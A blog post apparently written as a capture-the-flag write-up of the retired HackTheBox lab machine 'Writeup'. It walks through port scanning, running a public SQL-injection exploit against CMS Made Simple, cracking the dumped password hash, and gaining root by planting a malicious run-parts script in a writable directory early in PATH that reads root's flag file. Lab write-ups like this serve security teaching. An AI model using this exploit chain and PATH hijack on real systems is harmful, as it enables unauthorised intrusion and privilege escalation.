HTB: Writeup
Posted on 12 Oct 2019 in security • 4 min read
This article is a writeup about a retired HacktheBox machine: Writeup. (Yes the machine name is writeup, searching a writeup for writeup will be a funny thing.). The machine is classed as an easy one. It involves vulnerability in a known CMS as well as "PATH vulnerability" for the privilege escalation.
[TOC]
Recon
First of all we start by scanning the machine's open ports with nmap. Only port 22 (SSH) and 80 (HTTP) are open:
# Nmap 7.80 scan initiated Sun Sep 22 16:08:28 2019 as: nmap -oA nmap -sSV 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.089s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 22 16:08:43 2019 -- 1 IP address (1 host up) scanned in 15.20 seconds
Web, getting user
The homepage of this website is ugly and say that there is nothing there yet.
We take a look to robots.txt:
# __
# _(\ |@@|
# (__/\__ \--/ __
# \___|----| | __
# \ }{ /\ )_ / _\
# /\__/\ \__O (__
# (--/\--) \__/
# _)( )(_
# `---''---`
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
Let's take a look at /writeup/! We have there another website. When looking at
the page source code we notice the use of "CMS Made Simple" a CMS with a few
vulnerabilities.
<!doctype html>
<html lang="en_US"><head>
<title>Home - writeup</title>
<base href="http://10.10.10.138/writeup/" />
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
Let's search for exploits, a few of them are available:
# searchsploit 'made simple'
-------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------- ----------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) | exploits/php/remote/46627.rb
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | exploits/php/webapps/26217.html
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26298.txt
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | exploits/php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | exploits/php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities | exploits/php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution | exploits/php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | exploits/php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload | exploits/php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion | exploits/php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure | exploits/php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting | exploits/php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities | exploits/php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery | exploits/php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | exploits/php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery | exploits/php/webapps/34068.html
CMS Made Simple 2.1.6 - Multiple Vulnerabilities | exploits/php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution | exploits/php/webapps/44192.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | exploits/php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | exploits/php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning | exploits/php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection | exploits/php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload | exploits/php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload | exploits/php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload | exploits/php/webapps/46546.py
-------------------------------------------------------------------------------------- ----------------------------------
Shellcodes: No Result
As we are not authenticated, The one that interest us is "CMS Made Simple < 2.2.10 - SQL Injection (exploits/php/webapps/46635.py). We run the exploit (admire the beauty of the display). We then get a username, an email, a password salt and a password hash.
python 46635.py -u http://10.10.10.138/writeup
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
The exploit also allow to crack the password using a dictionary. We run "rockyou" against it and found jkr password.
# python 46635.py --crack -w ./rockyou.txt -u http://10.10.10.138/writeup
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
With this password we are able to connect to the box using SSH and get the user password:
# ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 22 12:31:00 2019 from 10.10.14.237
jkr@writeup:~$ cat user.txt
d4e493<redacted>
Root
We enumerate the box without a lot of success. A quick read of the box forum recommend to run pspy on the box. We discover that a script is run every time an user connect with SSH.
2019/09/25 07:39:49 CMD: UID=0 PID=4352 | sshd: [accepted]
2019/09/25 07:39:49 CMD: UID=0 PID=4353 | sshd: [accepted]
2019/09/25 07:40:01 CMD: UID=0 PID=4354 | sshd: jkr [priv]
2019/09/25 07:40:01 CMD: UID=0 PID=4355 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2019/09/25 07:40:01 CMD: UID=0 PID=4356 | run-parts --lsbsysinit /etc/update-motd.d
The PATH is fixed by the command line and there is no run-parts binary in the
first folder /usr/local/sbin. Moreover this folder is writable. Therefore
we write a simple file /usr/local/sbin/run-parts and give it the execution
permission:
jkr@writeup:~$ vim /usr/local/sbin/run-parts
#!/bin/bash
cat /root/root.txt > /tmp/lool/b
rm /tmp/lool/b
jkr@writeup:~$ chmod +x /usr/local/sbin/run-parts
We create a directory in /tmp/ and write the b file. At the same time be
connect by SSH with the jkr user. We get the root flag
jkr@writeup:~$ mkdir /tmp/lool/
jkr@writeup:~$ echo a > /tmp/lool/b
jkr@writeup:~$ tail -f /tmp/lool/b
a
tail: /tmp/lool/b: file truncated
eeba4<redacted>
Wrapping up
The user step implied only to use a know exploit without any change. The privilege escalation was really interesting as I didn't use pspy before.